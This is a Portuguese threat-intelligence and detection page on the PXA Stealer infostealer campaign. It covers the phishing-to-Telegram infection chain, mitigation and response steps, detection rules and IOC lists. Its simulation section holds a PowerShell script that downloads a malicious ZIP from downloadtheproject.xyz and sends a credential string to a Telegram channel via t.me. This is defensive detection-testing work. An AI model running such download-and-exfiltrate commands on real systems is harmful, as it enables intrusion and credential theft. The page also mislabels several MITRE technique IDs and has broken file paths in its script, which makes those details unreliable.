De Phishing a Exfiltração: Uma Análise Profunda do PXA Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório descreve um aumento acentuado na atividade do PXA Stealer, visando organizações financeiras no início de 2026. Agentes de ameaça disseminam arquivos ZIP maliciosos através de e-mails de phishing e dependem de uma cadeia de infecção em várias etapas que abusa de ferramentas legítimas do sistema e de um interpretador Python renomeado. Uma vez ativo, o malware rouba credenciais de navegadores, senhas salvas e dados de carteiras de criptomoedas, em seguida exfiltra as informações coletadas através do Telegram. A campanha destaca como os operadores ajustaram suas técnicas após interrupções anteriores em outros ecossistemas de infostealer.
Investigação
Pesquisadores da CyberProof reconstruíram toda a cadeia de ataque, começando com um e-mail de phishing que entregou um arquivo Pumaproject.zip malicioso e terminando com a exfiltração baseada no Telegram. Sua análise identificou o abuso do Certutil para decodificação, uma cópia do WinRAR disfarçada de picture.png para extração, uma pasta Dots oculta e um interpretador Python svchost.exe renomeado usado para lançar um script ofuscado vinculado a um identificador de bot. A persistência é mantida através de uma entrada de valor no registro.
Mitigação
Os defensores devem identificar anexos de arquivos suspeitos, monitorar a execução de scripts e LOLBins conhecidos de caminhos inesperados e bloquear o tráfego de saída para o Telegram, bem como TLDs incomuns como .shop and .xyz. As equipes de segurança também devem fortalecer os gateways de e-mail e aplicar controles rigorosos de execução para arquivos do Office e conteúdo baseado em script.
Resposta
Quando o PXA Stealer é detectado, isole o host afetado, capture evidências voláteis e procure os artefatos de arquivos referenciados e modificações de registro. Remova arquivos maliciosos, termine processos afetados e redefina quaisquer credenciais expostas. As equipes devem então realizar uma busca mais ampla por indicadores correspondentes em todo o ambiente e notificar as partes interessadas relevantes.
Fluxo de Ataque
Detecções
Execução de Processos do Sistema a partir de Caminhos Atípicos (via process_creation)
Ver
Comando e Controle Suspeitos por Pedido de DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
Ver
Execução Suspeita do Perfil de Usuário Público (via process_creation)
Ver
Extensão Incomum de Binário Executável (via process_creation)
Ver
Arquivos Suspeitos no Perfil de Usuário Público (via file_event)
Ver
Usando Certutil para Codificação de Dados e Operações de Certificado (via cmdline)
Ver
IOCs (HashMd5) para detectar: Do Phishing à Exfiltração: Um Mergulho Profundo no PXA Stealer Parte 2
Ver
IOCs (DestinationIP) para detectar: Do Phishing à Exfiltração: Um Mergulho Profundo no PXA Stealer
Ver
IOCs (HashMd5) para detectar: Do Phishing à Exfiltração: Um Mergulho Profundo no PXA Stealer Parte 1
Ver
IOCs (SourceIP) para detectar: Do Phishing à Exfiltração: Um Mergulho Profundo no PXA Stealer
Ver
IOCs (HashSha256) para detectar: Do Phishing à Exfiltração: Um Mergulho Profundo no PXA Stealer
Ver
Detecção das Atividades de Execução do PXA Stealer [Criação de Processo do Windows]
Ver
Detectar Conexões de Saída PXA Stealer [Conexão de Rede do Windows]
Ver
Execução de Simulação
Pré-requisito: O Verificação Prévia de Telemetria e Base deve ter passado.
Racional: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente as TTPs identificadas e buscam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque & Comandos:
O agente de ameaça implanta o PXA Stealer em um host Windows comprometido. Após o usuário executar inadvertidamente o binário malicioso inicial (T1204.002), o stealer executa um snippet de PowerShell que:-
Faz o download de um ZIP malicioso do domínio codificado
downloadtheproject.xyz(T1202 – execução indireta de comando). -
Exfiltra os dados colhidos enviando uma mensagem para um canal no Telegram via
t.me(T1559.002 – link de phishing). - Opcionalmente carrega um componente COM malicioso para alcançar persistência (T1127.002).
Ambos os pedidos HTTP GET geram os campos
DestinationDomainque a regra Sigma observa, causando um alerta. -
Faz o download de um ZIP malicioso do domínio codificado
-
Script de Teste de Regressão:
# Simulação PXA Stealer – aciona a regra de detecção $tmpZip = "$env:TEMPpayload.zip" $tmpMsg = "$env:TEMPsteal.txt" # 1. Download do ZIP malicioso do primeiro domínio malicioso Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing # 2. Simular exfiltração de dados via link do Telegram $payload = "Credenciais de usuário: admin / Pass123!" Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$( [uri]::EscapeDataString($payload) )" -UseBasicParsing # 3. (Opcional) Carregar um objeto COM fictício para emular T1127.002 try { $com = New-Object -ComObject "Shell.Application" $com.ShellExecute($tmpZip, "", "", "open", 0) | Out-Null } catch { # Ignorar erros – isto é apenas para telemetria } -
Comandos de Limpeza:
# Remover artefatos criados pela simulação Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue